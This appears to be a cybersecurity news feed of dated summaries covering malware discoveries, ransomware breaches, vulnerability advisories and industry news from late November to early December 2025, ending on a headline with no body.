Researchers at Trend Micro have discovered "GhostPenguin," a sophisticated, multi-threaded Linux backdoor written in C++. The malware remained completely undetected on VirusTotal for over four months after its initial submission. It was ultimately found using an AI-driven automated threat hunting pipeline designed to analyze zero-detection samples. GhostPenguin provides attackers with full remote shell access and file system control over an RC5-encrypted UDP channel, using port 53 to masquerade as DNS traffic, highlighting the growing need for AI in detecting emerging, stealthy threats.

Dec 9, 2025 · 5 min read

Vishing Attackers Impersonate IT on Teams, Trick Users into Running Fileless Malware

A sophisticated vishing (voice phishing) campaign is abusing trusted enterprise tools to deploy stealthy malware. Attackers impersonate IT support staff on Microsoft Teams, convincing users to initiate a Windows Quick Assist session. Once they have remote access, the attackers direct the user to a malicious site to download a loader. This loader then fetches an encrypted payload and executes it directly in memory using .NET reflection, a fileless technique designed to evade traditional antivirus and endpoint detection solutions. The campaign highlights the increasing trend of blending social engineering with the abuse of legitimate software.

Dec 9, 2025 · 5 min read

IBM Rolls Out Critical Patches for AIX, Cloud Pak, and Other Enterprise Software

IBM has released a wave of security updates addressing vulnerabilities in numerous enterprise products, prompting an advisory from the Canadian Centre for Cyber Security. The bulletins, published between December 1 and December 7, 2025, include critical patches for IBM AIX, VIOS, Aspera Shares, Business Automation Workflow, and Cloud Pak System, among others. Administrators are strongly urged to review the advisories and apply the necessary updates promptly to protect their infrastructure from potential exploitation.

Dec 9, 2025 · 4 min read

Race for Secure Digital Identity Heats Up with New Platforms from IBM and Turing Space

The digital identity space is seeing rapid innovation as IBM launches "Verify Digital Credentials," a new platform for issuing and authenticating secure digital documents like licenses and academic records. Built on open standards, it aims to reduce breach risk by decentralizing data storage. Concurrently, decentralized identity provider Turing Space is partnering with the IOTA blockchain to enhance its own verification offering, aiming to lower costs for enterprise-scale deployment. These moves highlight an industry-wide push towards verifiable credentials as a foundational defense against the growing threat of AI-powered deepfakes and identity fraud.

Dec 9, 2025 · 4 min read

Supply Chain Attack: Marquis Software Breach Hits 74 Banks, Akira Ransomware Suspected

Marquis Software Solutions, a U.S.-based financial software provider, has suffered a major data breach, compromising the sensitive information of over 400,000 customers across 74 client banks and credit unions. This significant supply chain attack is suspected to be the work of the Akira ransomware gang. According to investigators, the threat actors likely gained initial access by exploiting vulnerabilities in SonicWall firewall devices on Marquis's network. This incident highlights the cascading risk in the financial sector, where a compromise at a single software vendor can have widespread consequences for numerous downstream institutions and their customers.

Dec 8, 2025 · 5 min read

Cl0p Implicated in Oracle Zero-Day Attacks, Breaching UPenn and University of Phoenix

The University of Pennsylvania and the University of Phoenix have both reported data breaches resulting from the exploitation of zero-day vulnerabilities in their Oracle E-Business Suite servers. The attacks have compromised the personal information of at least 1,488 individuals at UPenn and a much larger, unspecified number of students, alumni, and staff at the University of Phoenix. Security researchers suspect the notorious Cl0p ransomware gang is behind the campaign, continuing their pattern of exploiting vulnerabilities in widely used enterprise software for large-scale data theft and extortion. Both institutions are currently notifying affected individuals.

Dec 8, 2025 · 5 min read

White House Sets 2025 Deadline for Post-Quantum Crypto Readiness

The White House has issued a new Executive Order to accelerate the U.S. federal government's transition to post-quantum cryptography (PQC). The order sets a critical deadline of December 1, 2025, for several key initiatives. It directs CISA and the NSA to create and maintain a list of commercially available products that support PQC standards, guiding federal procurement. It also mandates the development of new requirements for federal agencies to support TLS 1.3, a necessary precursor for PQC integration. Additionally, NIST is tasked with updating its Secure Software Development Framework (SSDF) to include practices for developing quantum-resistant software.

Dec 8, 2025 · 5 min read

WhatsApp Worm Spreads Astaroth Banking Trojan in New Brazilian Campaign

A new malware campaign, tracked as STAC3150, is targeting banking users in Brazil by using WhatsApp Web as a distribution vector for the Astaroth banking trojan. The attack begins with a social engineering lure sent via WhatsApp, which persuades the victim to download a malicious ZIP archive. The archive contains a VBS or HTA file that, when executed, initiates a multi-stage infection process to deploy the Astaroth trojan. Astaroth is a well-known information stealer designed to capture banking credentials and other sensitive data. This campaign highlights the increasing use of popular messaging platforms for malware delivery.

Dec 8, 2025 · 4 min read

SharePoint Flaw Chain Exploited to Deploy Warlock Ransomware

A new attack campaign attributed to the threat actor Storm-2603 is exploiting a chain of Microsoft SharePoint vulnerabilities (CVE-2025-49706, CVE-2025-49704) for initial access. Post-exploitation, the attackers deploy Velociraptor, a legitimate digital forensics and incident response (DFIR) tool, for reconnaissance and persistence. By abusing a trusted tool, the attackers blend in with normal administrative activity, evading detection. In several confirmed incidents, this attack chain culminates in the deployment of the Warlock ransomware. This 'living-off-the-land' technique highlights a sophisticated approach to facilitating ransomware attacks.

Dec 8, 2025 · 5 min read

Supply Chain Breach at Vendor Marquis Exposes Data From Dozens of US Banks

A ransomware attack on Marquis Software Solutions, a marketing and data analytics vendor for the financial industry, has resulted in a significant supply chain data breach affecting dozens of U.S. banks and credit unions. Marquis began notifying its clients on November 26, 2025, about the incident, which was first detected in August. The breach exposed highly sensitive customer information, including names, Social Security numbers, taxpayer IDs, and financial account details, that the financial institutions had entrusted to the vendor. While the banks' internal systems were not compromised, the incident highlights the profound risks associated with third-party vendors. At least 42,000 individuals in Maine alone have been affected, and Marquis is offering credit monitoring services to impacted customers.

Dec 8, 2025 · 6 min read

Malicious Go Packages Impersonating Google UUID Library Steal Data

A sophisticated and long-running supply chain attack targeting Go developers has been discovered, active since at least May 2021. The attack involves two malicious packages, `github.com/bpoorman/uuid` and `github.com/bpoorman/uid`, which impersonate a popular Google UUID library using a typosquatting technique. The counterfeit packages are fully functional to avoid suspicion but contain a hidden backdoor. A specific function, `Valid`, is weaponized to secretly encrypt and exfiltrate any data passed to it, such as user IDs or session tokens, to an external paste site. This stealthy method allows the attacker, 'bpoorman', to siphon sensitive information from compromised applications.

Dec 7, 2025 · 4 min read

Mexico's Maguen Group Launches Global Cybersecurity Brand 'Fortem'

Maguen Group, a leading private security firm based in Mexico, has officially launched Fortem Cybersecurity, its new global cybersecurity brand, on December 7, 2025. The new entity is an evolution of the company's existing cybersecurity arm, MT Cyber, which it acquired in 2019. With Fortem, Maguen Group aims to 'democratize cybersecurity' by offering enterprise-level protection to companies of all sizes. The launch marks a strategic push for global expansion, leveraging its existing presence in Mexico, Ecuador, and Germany, with the United States targeted as the next major market.

Dec 7, 2025 · 2 min read

Malicious Rust Package 'evm-units' Targets Web3 Developers

A malicious software package named 'evm-units' has been discovered and removed from Rust's official crates.io registry. The package, downloaded over 7,200 times, targeted Web3 developers by impersonating a legitimate utility for the Ethereum Virtual Machine (EVM). While appearing functional, the crate contained a stealthy, multi-stage loader designed to download and execute operating system-specific malware. The malware included code to specifically evade 360 Total Security, a popular antivirus in China, suggesting the threat actor's focus was on stealing cryptocurrency from developers, likely in the Asian market. A second package, 'uniswap-utils', was also removed for depending on the malicious crate.

Dec 7, 2025 · 4 min read

Wireshark Vulnerabilities Create Denial-of-Service Risk for Security Teams

France's national cybersecurity agency, CERT-FR, has issued a security advisory for two critical vulnerabilities in Wireshark, the world's most popular network protocol analyzer. The flaws, identified as CVE-2025-13945 and CVE-2025-13946, can be exploited by a remote attacker to cause a denial-of-service (DoS) condition. This poses a significant risk to security operations, as an attacker could crash the tool during a live incident investigation, effectively blinding security analysts. Users are urged to update to the patched versions (4.4.12 and 4.6.2) to mitigate the risk.

Dec 7, 2025 · 3 min read

Washington Post Breached by Clop Ransomware via Oracle Flaws

The Washington Post has officially confirmed it was a victim of a large-scale cyberattack orchestrated by the Clop ransomware group. The threat actors exploited vulnerabilities in Oracle's E-Business Suite, compromising over 100 organizations globally. The campaign involves data exfiltration followed by aggressive extortion tactics, with Clop publicly naming victims on its dark web leak site to pressure them into paying ransoms reportedly as high as $50 million. This incident underscores the significant risk posed by vulnerabilities in widely used enterprise software and the sophisticated, multi-faceted extortion methods employed by modern ransomware gangs.

Dec 7, 2025 · 6 min read

CISA: Commercial Spyware Hijacking Signal & WhatsApp via Zero-Clicks

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued a critical alert regarding active campaigns using commercial spyware to compromise the Signal and WhatsApp accounts of high-value targets. Attackers are employing sophisticated methods including social engineering, malicious QR codes for device linking, and zero-click exploits that require no user interaction. The campaigns are reportedly targeting current and former government officials, military personnel, and civil society organizations across the U.S., Europe, and the Middle East. CISA warns that initial access to messaging apps is often used as a beachhead to deploy further malware and achieve full device compromise.

Dec 7, 2025 · 5 min read

Global Coalition Targets 'Bulletproof' Hosting Services Fueling Cybercrime

An international coalition of cybersecurity agencies, including the NSA, CISA, and the FBI, has launched a coordinated effort to combat 'bulletproof' hosting (BPH) providers. These services knowingly lease infrastructure to cybercriminals for activities like ransomware and phishing. A new joint advisory urges Internet Service Providers (ISPs) and network defenders to adopt strategies to identify, block, and report these malicious hosts. The guidance focuses on a nuanced approach, including creating high-confidence blocklists and improving 'know your customer' processes, to disrupt the foundational infrastructure of cybercrime.

Dec 6, 2025 · 4 min read

Cloudflare Outage Hits 28% of Global Traffic After Faulty React2Shell Patch

Cloudflare, a leading internet infrastructure provider, experienced a 25-minute global outage on December 5, 2025, that impacted approximately 28% of its HTTP traffic and made numerous popular websites inaccessible. The company quickly confirmed the disruption was not a cyberattack but was self-inflicted, caused by a faulty emergency change to its Web Application Firewall (WAF). The problematic update was deployed to provide mitigation against the critical React2Shell (CVE-2025-55182) vulnerability. The incident highlights the inherent risks of rapid, large-scale deployments, even when intended to improve security, and raises questions about change management processes for critical infrastructure.

Dec 6, 2025 · 4 min read

AI Infrastructure at Risk: MCP Servers Emerge as New Supply Chain Threat

A new security advisory warns that Model Context Protocol (MCP) servers represent a significant and growing supply chain risk for organizations building AI-powered applications. These servers act as highly privileged automation engines, often possessing trusted access to sensitive enterprise resources like code repositories, email systems, and internal APIs. The warning follows the analysis of a critical vulnerability at hosting service Smithery.ai, where a single path traversal flaw could have allowed an attacker to gain administrative control over 3,000 hosted MCP servers. This and other incidents demonstrate that MCP servers are high-value targets that can be exploited to compromise entire AI software supply chains.

Dec 6, 2025 · 5 min read

Iran Bans Officials From Using All Internet-Connected Devices Over Espionage Fears

In a drastic measure to combat espionage, Iran's Cybersecurity Command has banned all government officials and their security staff from using any device connected to public communication networks. The directive, reported on December 5, 2025, includes smartphones, laptops, and smartwatches. The move is a direct response to fears of hacking and mobile tracking being used for targeted assassinations, referencing past attacks on nuclear scientists and recent pager and walkie-talkie attacks against Hezbollah. The policy highlights a security philosophy of complete network isolation for key personnel over reliance on defensive technology.

Dec 6, 2025 · 4 min read

Massive Supply Chain Attack Hits 200+ Companies via Salesforce App; Hacker Group Claims Breach

A hacking collective known as Scattered Lapsus$ Hunters has claimed responsibility for a large-scale supply chain attack that compromised the Salesforce data of over 200 organizations. The attack did not exploit a vulnerability in Salesforce itself, but rather abused OAuth tokens from the Gainsight customer-success application. The attackers gained unauthorized access to customer data, prompting Salesforce to revoke all tokens for the app. The group has named high-profile victims like Atlassian, Docusign, and Verizon, highlighting the significant risks of SaaS-to-SaaS integrations.

Dec 5, 2025 · 6 min read

New "Benzona" Ransomware Strain Discovered in the Wild

Security researchers at CYFIRMA have discovered a new ransomware strain named "Benzona." The malware encrypts files on Windows, macOS, and Linux systems, appending a ".benzona" extension and dropping a ransom note titled "RECOVERY_INFO.txt". Victims are instructed to use the TOR browser to access a chat portal for recovery negotiations. The threat actors behind Benzona are believed to use a variety of initial access vectors, including social engineering, botnets, and exploitation of software vulnerabilities.

Dec 5, 2025 · 4 min read

Critical 7-Zip RCE Vulnerability Now Under Active Exploitation

A critical remote code execution (RCE) vulnerability in the popular 7-Zip file archiver, tracked as CVE-2025-11001, is now being actively exploited in the wild. The path traversal flaw, which affects versions prior to 25.0.0, can be triggered when a user extracts a specially crafted malicious archive. This allows an attacker to write files to arbitrary locations and execute code. NHS England has issued an advisory confirming active exploitation, urging all organizations to update their installations immediately.

Dec 5, 2025 · 4 min read

CISA Exposes 'BRICKSTORM' Backdoor Used by Chinese State Actors to Infiltrate US Government

The US Cybersecurity and Infrastructure Security Agency (CISA), NSA, and Canadian Centre for Cyber Security have jointly exposed a sophisticated backdoor named 'BRICKSTORM'. According to the December 4, 2025 advisory, People's Republic of China (PRC) state-sponsored actors are using this malware to target government and IT sector organizations. BRICKSTORM is designed for stealth and long-term persistence in both VMware vSphere and Windows environments. It employs multi-layered encrypted communications, including DNS-over-HTTPS (DoH), to hide its C2 traffic. The advisory details an attack chain where actors used a web shell for initial access, moved laterally via RDP, and ultimately deployed BRICKSTORM on a VMware vCenter server to compromise domain controllers. Agencies are urged to hunt for this threat immediately.

Dec 4, 2025 · 6 min read

Android Zero-Days Under Active Attack, CISA Adds to KEV Catalog

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added two high-severity Android zero-day vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog, indicating they are under active attack. The vulnerabilities, CVE-2025-48633 (Information Disclosure) and CVE-2025-48572 (Elevation of Privilege), affect the core Android Framework on versions 13, 14, 15, and 16. Google's December 2025 security bulletin confirmed the flaws may be subject to 'limited, targeted exploitation,' a pattern often associated with sophisticated spyware campaigns. Federal agencies are now mandated to patch these vulnerabilities, and all Android users are urged to apply the latest security updates as soon as possible to protect against potential device compromise.

Dec 4, 2025 · 4 min read

Ransomware Payments Exceed $2.1 Billion Since 2022, FinCEN Reports

A new Financial Trend Analysis from the U.S. Treasury's Financial Crimes Enforcement Network (FinCEN), released December 4, 2025, reveals that financial institutions reported over $2.1 billion in ransomware-related payments between January 2022 and December 2024. The data, derived from Bank Secrecy Act (BSA) filings, shows a peak in 2023 with $1.1 billion in payments. The report identifies ALPHV/BlackCat, LockBit, and Akira as some of the most prevalent variants, with the manufacturing and financial services sectors being the most frequent victims. The analysis underscores the critical role of BSA reporting in tracking cybercrime trends and informing law enforcement actions.

Dec 4, 2025 · 4 min read

Freedom Mobile Data Breach Exposes Customer PII via Compromised Subcontractor

Canadian telecommunications provider Freedom Mobile announced on December 3, 2025, that it suffered a data breach after an unauthorized party gained access to its systems on October 23, 2025. The attacker leveraged the compromised account of a third-party subcontractor to access a customer account management platform. Exposed data includes customer names, addresses, birth dates, phone numbers, and account numbers. Freedom Mobile stated that more sensitive data like payment card information and passwords were not affected. The company is notifying a 'limited number' of affected individuals and advising them to be vigilant against phishing attacks.

Dec 4, 2025 · 4 min read

CISA KEV Alert: Actively Exploited ScadaBR Flaw Puts Industrial Control Systems at Risk

CISA has added CVE-2021-26828, a high-severity vulnerability in the OpenPLC ScadaBR industrial control system (ICS) software, to its Known Exploited Vulnerabilities (KEV) catalog as of December 3, 2025. The flaw, with a CVSS score of 8.7, is an unrestricted file upload vulnerability that allows an authenticated attacker to achieve remote code execution (RCE) by uploading a malicious JSP file. This poses a significant risk to operational technology (OT) environments where this open-source SCADA solution is deployed. Federal agencies are mandated to patch by December 24, 2025, and CISA urges all organizations in critical infrastructure sectors to prioritize remediation.

Dec 4, 2025 · 5 min read

Under Armour Sued Over Data Breach Attributed to 'Everest' Cybercrime Group

Athletic apparel giant Under Armour is the target of a new class action lawsuit following a November 2025 data breach. The suit, reported on December 4, 2025, claims the company was negligent in protecting the personal information of consumers and employees. The breach was allegedly carried out by the 'Everest' cybercriminal group, which claims to have stolen and leaked hundreds of gigabytes of data. The lawsuit asserts that Under Armour failed to implement basic cybersecurity measures like encryption and did not provide timely notification to victims, who now face a heightened risk of identity theft and fraud.

Dec 4, 2025 · 4 min read

Critical Zero-Days in PyTorch Scanner 'PickleScan' Create AI Supply Chain Risk

Security firm JFrog has disclosed three critical zero-day vulnerabilities in PickleScan, a popular open-source tool used to scan Python pickle files for malware, particularly within the PyTorch AI framework. The flaws, collectively rated with a CVSS score of 9.3, allow an attacker to craft a malicious AI model that bypasses PickleScan's security checks. When this seemingly safe model is loaded by a user, it can lead to arbitrary code execution. This discovery, announced on December 3, 2025, highlights a significant software supply chain risk for the AI/ML community, as attackers could distribute weaponized models that evade standard security scanning.

Dec 4, 2025 · 5 min read

AWS Boosts Cloud Defense with New AI-Powered Security Tools at re:Invent 2025

At its re:Invent 2025 conference, Amazon Web Services (AWS) unveiled several major additions to its security portfolio, heavily infused with artificial intelligence. Key announcements on December 3, 2025, included the preview of AWS Security Agent, a context-aware tool for proactive application security testing throughout the development lifecycle. AWS also announced the general availability of its revamped AWS Security Hub for centralized cloud security posture management (CSPM) and new attack sequence findings in Amazon GuardDuty for better threat detection in EC2 and ECS environments. These updates aim to automate and enhance security operations for organizations in the cloud.

Dec 4, 2025 · 4 min read

React2Shell: Critical 10.0 CVSS RCE Hits React & Next.js, Actively Exploited!

A critical unauthenticated remote code execution (RCE) vulnerability, dubbed 'React2Shell' and tracked as CVE-2025-55182, has been disclosed in React Server Components. With a maximum CVSS score of 10.0, the flaw affects popular frameworks like Next.js and allows attackers to take complete control of vulnerable servers. Security researchers have already observed active exploitation in the wild, with attackers attempting to harvest cloud credentials and deploy cryptocurrency miners. Major cloud providers have issued WAF rules as a temporary mitigation, but immediate patching is essential.

Dec 3, 2025 · 6 min read

ValleyRAT Malware Targets Job Seekers Using Foxit PDF Reader Disguise

A new malware campaign is distributing the ValleyRAT remote access trojan by preying on job seekers. Attackers send emails with weaponized executables disguised as HR documents, using the Foxit PDF Reader icon as a lure. The attack leverages a legitimate, renamed Foxit executable to perform a DLL side-loading attack, which silently loads the malware while displaying a decoy document to the victim. Once active, ValleyRAT provides attackers with full control over the compromised system, enabling data theft and surveillance.

Dec 3, 2025 · 5 min read

G7 Unveils New Framework for Coordinated Cyber Response in Financial Sector

The G7 Cyber Expert Group has published a new policy paper outlining non-binding principles for Collective Cyber Incident Response and Recovery (CCIRR) within the global financial sector. The framework, developed to foster greater cross-border cooperation, aims to improve information sharing, streamline crisis communication, and bolster the resilience of the international financial system against major cyber incidents. The principles are intended as a high-level guide rather than a set of regulatory requirements.

Dec 3, 2025 · 4 min read

EU Cyber Resilience Act Deadlines Loom: Vulnerability Reporting Starts 2026

The European Union is advancing the implementation of its landmark Cyber Resilience Act (CRA), which establishes mandatory cybersecurity requirements for all hardware and software products sold in the EU. With the regulation now in force, key deadlines are approaching. Manufacturers must prepare for a critical milestone in September 2026, when obligations to report actively exploited vulnerabilities to authorities within 24 hours will begin. The act aims to enforce security-by-design and ensure products remain secure throughout their lifecycle.

Dec 3, 2025 · 5 min read

Qilin Ransomware Gang Claims 7 of 11 New Victims in 24 Hours

The daily ransomware report for November 8, 2025, highlights a significant burst of activity from the Qilin ransomware group, which claimed responsibility for 7 of the 11 new victims announced in the past 24 hours. The DragonForce group was the second most active with three victims. The attacks primarily targeted the professional services and manufacturing sectors, with victims located in the United States, Canada, and the United Kingdom. This latest surge brings the total number of publicly claimed ransomware victims in 2025 to 6,364, underscoring the relentless and persistent threat that ransomware-as-a-service (RaaS) operations pose to organizations globally.

Dec 2, 2025 · 5 min read

SmartTube App Compromised: Malicious Update Pushed via Stolen Keys

A significant supply chain attack has compromised the popular ad-free YouTube client for Android TV, SmartTube. An attacker stole the developer's signing keys and distributed a malicious update containing surveillance-style malware through official channels. The malware, hidden in versions 30.43 through 30.55, collected device information and sent it to a command-and-control server. In response, Google Play Protect began automatically disabling the app on user devices. The developer has since revoked the compromised keys and released a new, clean version, which requires all users to perform a manual reinstallation to ensure their security.

Dec 2, 2025 · 5 min read

'Cryptomixer' Shut Down: Authorities Seize €25M in Bitcoin from Laundering Service

A coordinated international law enforcement action, codenamed "Operation Olympia," has successfully dismantled Cryptomixer.io, a major cryptocurrency mixing service. Led by Swiss and German authorities with significant support from Europol and Eurojust, the takedown resulted in the seizure of servers, 12 terabytes of data, and over €25 million in Bitcoin. The service, active since 2016, is believed to have laundered over €1.3 billion for a wide range of criminal groups, including ransomware gangs and the North Korean Lazarus Group, by obfuscating the trail of illicit funds.

Dec 2, 2025 · 4 min read

Iran-Linked MuddyWater APT Targets Israel with New 'MuddyViper' Backdoor

The Iranian-affiliated APT group MuddyWater has been observed in a new cyberespionage campaign targeting critical infrastructure and other key sectors in Israel and Egypt. Active from late 2024 to early 2025, the campaign leverages a previously undocumented custom C/C++ backdoor named MuddyViper. The malware is delivered via a loader called Fooder, which in some cases was disguised as the classic Snake game to deceive victims. The group, also known as Mango Sandstorm, used the backdoor for espionage, credential theft, and remote command execution, and showed operational overlap with another Iranian group, Lyceum.

Dec 2, 2025 · 6 min read

Lazarus APT's Remote IT Worker Infiltration Scheme Exposed in Real-Time

A joint investigation by security researchers has exposed the inner workings of a North Korean Lazarus Group scheme where operatives commit identity fraud to get hired as remote IT workers at Western firms. By luring the threat actors into a sophisticated honeypot environment, researchers from BCA LTD, NorthScan, and ANY.RUN were able to capture their tactics, techniques, and procedures (TTPs) in real-time. The scheme's goals are twofold: to gain persistent network access for espionage and to funnel salaries back to the Democratic People's Republic of Korea (DPRK) in violation of international sanctions.

Dec 2, 2025 · 6 min read

India Backs Down on Mandatory Pre-Installed Government "Snooping App"

Following widespread criticism from privacy advocates and significant resistance from major tech companies, the Indian government has withdrawn a controversial directive that would have required smartphone makers like Apple and Samsung to pre-install a non-deletable, state-owned security app. The app, named "Sanchar Saathi," was labeled a potential "snooping app" by critics, who raised concerns that it could be used as a tool for mass surveillance, violating citizens' right to privacy. The swift reversal marks a notable event in the ongoing global debate over digital privacy and government authority.

Dec 2, 2025 · 4 min read

AI Cybersecurity Firm Tenex Expands to EMEA with New Funding

AI-native cybersecurity firm Tenex announced its expansion into the Europe, Middle East, and Africa (EMEA) region on December 2, 2025. The strategic move is supported by a new Series A investment from the global investment firm DTCP. Tenex, which offers an AI-driven managed detection and response (MDR) service, has seen rapid growth since its founding in January 2025 and plans to establish an international headquarters in Europe in 2026 to capitalize on the region's demand and talent pool.

Dec 2, 2025 · 2 min read

CrowdStrike Named AWS Global Security and Marketplace Partner of the Year

At the AWS re:Invent 2025 conference, cybersecurity leader CrowdStrike was named both the Amazon Web Services (AWS) 2025 Global Security Partner of the Year and the Global Marketplace Partner of the Year. This dual recognition follows a landmark achievement for CrowdStrike, which became the first cloud-native independent software vendor (ISV) to surpass $1 billion in sales through the AWS Marketplace within a single calendar year, underscoring the strength of its cloud security offerings and its partnership with AWS.

Dec 2, 2025 · 3 min read

Coupang Breach Exposes 33.7 Million Users in South Korea

South Korean e-commerce leader Coupang has admitted to a significant data breach exposing the personal information of 33.7 million customers, impacting over half of South Korea's population. The breach, which began in June 2025 and was detected in mid-November, stemmed from authentication vulnerabilities and the potential misuse of an ex-employee's still-active authentication key. Exposed data includes names, emails, phone numbers, and addresses. Coupang has reset user passwords and is working with authorities, including the Korea Internet & Security Agency (KISA), on the investigation.

Dec 1, 2025 · 6 min read

Urgent Android Update: Google Patches 107 Flaws, Two Zero-Days Under Active Attack

Google has issued its December 2025 Android security bulletin, patching a total of 107 vulnerabilities. The update is critical, as it addresses two high-severity zero-days, CVE-2025-48633 (Information Disclosure) and CVE-2025-48572 (Elevation of Privilege), which are under limited, targeted exploitation in the wild. The patch also fixes a critical remote denial-of-service (DoS) flaw, CVE-2025-48631, in the Android Framework. The update covers vulnerabilities in components from Qualcomm, Arm, MediaTek, and others, affecting Android versions 13 through 16. Users are urged to install the update as soon as it becomes available for their devices.

Dec 1, 2025 · 5 min read

APTs Exploit WinRAR Zero-Day to Target Industrial Sector in Q3 2025

Kaspersky's Q3 2025 threat report for industrial organizations highlights extensive exploitation of a WinRAR zero-day vulnerability, CVE-2025-8088. The flaw was used by multiple threat actors, including the RomCom cybercrime group and the Paper Werewolf (GOFFEE) APT, to deploy backdoors like SnipBot and the Mythic agent against industrial targets. The report also details other significant cyber-espionage campaigns, such as PhantomCore's attacks on Russian critical infrastructure and Cavalry Werewolf's phishing operations against energy and manufacturing sectors, underscoring the persistent threat to industrial control systems (ICS).

Dec 1, 2025 · 6 min read

FTC Slams EdTech Firm Illuminate Education Over Breach of 10M Students' Data

The U.S. Federal Trade Commission (FTC) has taken enforcement action against education technology provider Illuminate Education for a 2021 data breach that exposed the personal and health information of 10.1 million students. The FTC alleged the company failed to implement reasonable security measures, citing the attacker's use of credentials from an employee who had left 3.5 years prior. Under the settlement, Illuminate must implement a comprehensive security program, delete non-essential student data, and undergo third-party assessments, highlighting severe consequences for failing to protect children's data.

Dec 1, 2025 · 5 min read

Warning: Public PoC Exploit Released for Critical Zero-Click Outlook RCE Flaw

A proof-of-concept (PoC) exploit has been publicly released for CVE-2024-21413, a critical zero-click remote code execution (RCE) vulnerability in Microsoft Outlook nicknamed 'MonikerLink'. The flaw allows an attacker to execute arbitrary code on a victim's machine simply by sending a malicious email, with no user interaction required. The release of the PoC dramatically increases the risk of widespread exploitation. All organizations using affected versions of Outlook are urged to apply the security patches released by Microsoft immediately to prevent compromise.

Dec 1, 2025 · 5 min read

Mystery Breach: Major Tech Firm Exposes Millions of Users' Data

A major, but currently unnamed, technology company has reportedly suffered a massive data breach, exposing the personal data of millions of users worldwide. The breach was detected on November 24, 2025, after unusual activity was observed on the company's servers, stemming from an unspecified vulnerability. The company has reportedly shut down the compromised servers, notified authorities, and begun alerting users. This incident is being described as one of the largest in recent years, placing millions at risk of identity theft and phishing attacks.

Dec 1, 2025 · 5 min read

US Probes Bitcoin Mining Giant Bitmain for National Security Threats

The U.S. Department of Homeland Security is reportedly conducting a probe, codenamed 'Operation Red Sunset,' into Chinese bitcoin mining hardware manufacturer Bitmain. According to reports from November 29, 2025, the investigation centers on fears that Bitmain's mining devices could contain hidden backdoors for espionage or capabilities to sabotage the U.S. electrical grid. The probe allegedly involves physically inspecting imported hardware at U.S. ports for kill switches or remote access features. Bitmain has denied the allegations, but the investigation highlights growing national security concerns surrounding foreign-made hardware in critical infrastructure sectors.

Nov 30, 2025 · 5 min read

Yearn Finance Hit by $9M 'Infinite Mint' Exploit

On November 30, 2025, the DeFi protocol Yearn Finance was exploited for approximately $9 million. The attacker leveraged a flaw in a legacy yETH stableswap smart contract, using a deposit of just 16 wei (a fraction of a cent) to mint a massive 235 septillion yETH tokens. The vulnerability stemmed from the contract's failure to clear cached storage variables after liquidity was fully drained. By manipulating these phantom balances, the attacker triggered an 'infinite mint' condition, subsequently draining the pool's assets into a Balancer pool. Around $3 million was quickly laundered through the Tornado Cash mixer.

Nov 30, 2025 · 5 min read

Amazon Data Center Blueprints Leaked in Breach of Steel Contractor

A significant data breach at Cooper Steel Fabricators, a major U.S. structural steel contractor, was reported on November 30, 2025. A threat actor is selling a 330 GB database, claiming it is a 'complete mirror' of the company's FTP server. The asking price is $28,500. The leaked data allegedly contains highly sensitive intellectual property, including detailed blueprints and structural models for an Amazon data center in Ohio and a sorting facility in Massachusetts. Blueprints for Walmart distribution centers are also included, highlighting the severe supply chain risks that can expose the critical infrastructure plans of major corporations.

Nov 30, 2025 · 5 min read

Gaming Giant Netmarble Breached, 6.1 Million Users' Data Exposed

South Korean gaming company Netmarble confirmed on November 30, 2025, that it suffered a data breach on November 22, exposing the personal information of 6.11 million members of its PC game portal. The compromised data includes names, birthdates, and encrypted passwords. The leak also affected 66,000 PC cafe owners and 17,000 current and former employees. Netmarble came under fire for waiting nearly 72 hours to report the incident to the Korea Internet & Security Agency (KISA), raising concerns about its incident response transparency.

Nov 30, 2025 · 5 min read

CodeRED Alert System Hit by Ransomware, Wall Street Scrambles After Vendor Hack

A weekend news roundup from November 29, 2025, covered several major cyber incidents. The nationwide CodeRED emergency alert system, provided by OnSolve, was hit by an INC Ransom attack, disrupting a critical public safety service. In finance, Wall Street banks were assessing the fallout from a breach at a third-party real estate data firm, exposing ongoing supply chain risks. Additionally, the pro-Ukrainian hacktivist group Ukrainian Cyber Alliance claimed responsibility for a destructive attack on Donbas Post, the Russian-run postal service in occupied Ukraine, reportedly wiping over a thousand systems.

Nov 30, 2025 · 5 min read

Comcast Fined $1.5M by FCC for Vendor's Data Breach

Comcast has agreed to a $1.5 million settlement with the Federal Communications Commission (FCC) following a 2024 data breach at a former vendor. The breach occurred at Financial Business and Consumer Solutions (FBCS), a debt collection agency, and exposed the personal information of nearly 238,000 Comcast customers, including names, addresses, and Social Security numbers. FBCS filed for bankruptcy before disclosing the breach, leaving Comcast to face the regulatory fallout. As part of the settlement, Comcast will implement a stricter vendor security compliance plan, highlighting the growing regulatory expectation for companies to secure their entire supply chain.

Nov 30, 2025 · 5 min read

Global Infrastructure Breach Alert Confirmed as False Alarm

Initial reports on November 30, 2025, of a major security breach impacting global infrastructure were officially confirmed to be a false alarm. The panic was triggered when automated monitoring tools misinterpreted routine, benign system tests as a sophisticated cyberattack, leading to a cascade of incorrect alerts. While no data was stolen and no systems were compromised, the incident has exposed potential weaknesses in cyber-alerting systems and their ability to differentiate between normal administrative actions and genuine threats. The event has prompted calls for improving alert validation processes to maintain public trust.

Nov 30, 2025 · 4 min read

Asahi Confirms Qilin Ransomware Breach Exposed Data of Nearly 2 Million

Japanese beverage giant Asahi Group Holdings has confirmed a September 2025 ransomware attack by the Qilin group resulted in a massive data breach affecting 1.914 million individuals. The breach exposed the personal information of customers, employees, and business contacts, leading to significant operational disruptions, including production halts and product shortages. The attackers gained initial access through compromised network equipment and moved laterally to deploy ransomware across Asahi's domestic data centers. While no financial data was stolen, the exposed PII includes names, addresses, phone numbers, and dates of birth.

Nov 29, 2025 · 6 min read

Qilin's "Korean Leaks" Hits 28 Financial Firms via MSP Supply Chain Attack

The Qilin ransomware group has executed a devastating supply-chain attack, dubbed "Korean Leaks," by breaching GJTec, a South Korean managed service provider (MSP). This single point of failure allowed the attackers to compromise at least 28 of the MSP's downstream financial services clients. The campaign, which ran in waves from September to October 2025, resulted in the exfiltration of over 2TB of data. Researchers from Bitdefender have noted potential links to the North Korean state-affiliated group Moonstone Sleet, suggesting a hybrid operation blending financial extortion with geopolitical motives.

Nov 29, 2025 · 6 min read

TryHackMe Apologizes for All-Male Panel After Community Backlash

